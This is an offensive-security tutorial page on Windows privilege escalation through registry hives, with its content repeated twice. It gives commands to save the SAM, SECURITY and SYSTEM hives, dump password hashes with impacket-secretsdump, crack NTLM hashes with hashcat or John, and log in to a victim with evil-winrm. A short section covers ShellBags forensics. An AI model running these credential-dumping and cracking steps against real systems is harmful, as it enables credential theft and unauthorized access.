Windows PrivEsc with Registry Keys

The Windows Registry is a hierarchical database that stores low-level settings for Windows and for applications that opt to use the registry. Registry keys are container objects, which contain values

PreviousWindows PrivEsc with LocalPotato NextWindows PrivEsc with RemotePotato

Last updated 1 year ago

Windows PrivEsc with Registry Keys

The Windows Registry is a hierarchical database that stores low-level settings for Windows and for applications that opt to use the registry. Registry keys are container objects, which contain values

A hive is a logical group of keys, subkeys, and values in the registry that has a set of supporting files loaded into memory when the operating system is started or a user logs in.

If we can access to registries and get registry hives, the password hashes can be dumped. Copy three hives (SAM, SECURITY, SYSTEM) to arbitrary direcotyr where we can access.

# save: Saves a copy of specified subkeys, entries, and values of the registry in a specified file.
# HKLM: HKEY_LOCAL_MACHINE
reg save HKLM\sam c:\Users\<user>\Desktop\sam.save
reg save HKLM\security c:\Users\<user>\Desktop\security.save
reg save HKLM\system c:\Users\<user>\Desktop\system.save
Copied!

After that, we can dump password hashes from hives.

impacket-secretsdump -sam sam.save -system system.save -security security.save LOCAL
Copied!

After dumping hashes, we can crack them. First, we extract NTLM from the hash. For example, the dumped hash is below.

Administrator:500:abcdefghi...:zyxwvuts...:::
Copied!

We need only the right string "zyxwvuts…", so extract it to a text file as below.

echo -n "zyxwvuts..." > hash.txt
Copied!

# Hashcat
# -m 1000: mode NTLM
hashcat -m 1000 hash.txt wordlist.txt

# John The Ripper
john --format=nt --wordlist=wordlist.txt hash.txt
Copied!

If we get the password, we can use it for abusing the target machine. For example, we can use it to WinRM as below.

evil-winrm -i <victim_ip> -u <victim_username> -p <victim_password>
Copied!

A set of registry keys that store details about a viewed folder, such as its size, position, and icon.

c:\Users\<username>\AppData\Local\Microsoft\Windows\UsrClass.dat
Copied!

If we cannot found AppData folder in Explorer, click "View" tab and check "Hidden Items".

Search "regedit" on search bar and open "Registry Editor"
Go to "Computer\HKEY_CLASSES_ROOT\LocalSettings\Software\Microsoft\Windows\Shell\Bags"

Extract ShellBags information.

Open "ShellBags Explorer"
Select "File" -> "Load offline hive"
Navigate to the UsrClass.dat and open the file
Find suspicious folder and file

PreviousWindows PrivEsc with LocalPotato NextWindows PrivEsc with RemotePotato

Last updated 1 year ago

A hive is a logical group of keys, subkeys, and values in the registry that has a set of supporting files loaded into memory when the operating system is started or a user logs in.

If we can access to registries and get registry hives, the password hashes can be dumped. Copy three hives (SAM, SECURITY, SYSTEM) to arbitrary direcotyr where we can access.

# save: Saves a copy of specified subkeys, entries, and values of the registry in a specified file.
# HKLM: HKEY_LOCAL_MACHINE
reg save HKLM\sam c:\Users\<user>\Desktop\sam.save
reg save HKLM\security c:\Users\<user>\Desktop\security.save
reg save HKLM\system c:\Users\<user>\Desktop\system.save
Copied!

After that, we can dump password hashes from hives.

impacket-secretsdump -sam sam.save -system system.save -security security.save LOCAL
Copied!

After dumping hashes, we can crack them. First, we extract NTLM from the hash. For example, the dumped hash is below.

Administrator:500:abcdefghi...:zyxwvuts...:::
Copied!

We need only the right string "zyxwvuts…", so extract it to a text file as below.

echo -n "zyxwvuts..." > hash.txt
Copied!

Now crack it using Hashcat or John The Ripper. See more details .

# Hashcat
# -m 1000: mode NTLM
hashcat -m 1000 hash.txt wordlist.txt

# John The Ripper
john --format=nt --wordlist=wordlist.txt hash.txt
Copied!

If we get the password, we can use it for abusing the target machine. For example, we can use it to WinRM as below.

evil-winrm -i <victim_ip> -u <victim_username> -p <victim_password>
Copied!

A set of registry keys that store details about a viewed folder, such as its size, position, and icon.

c:\Users\<username>\AppData\Local\Microsoft\Windows\UsrClass.dat
Copied!

If we cannot found AppData folder in Explorer, click "View" tab and check "Hidden Items".

Search "regedit" on search bar and open "Registry Editor"
Go to "Computer\HKEY_CLASSES_ROOT\LocalSettings\Software\Microsoft\Windows\Shell\Bags"

Extract ShellBags information.

Open "ShellBags Explorer"
Select "File" -> "Load offline hive"
Navigate to the UsrClass.dat and open the file
Find suspicious folder and file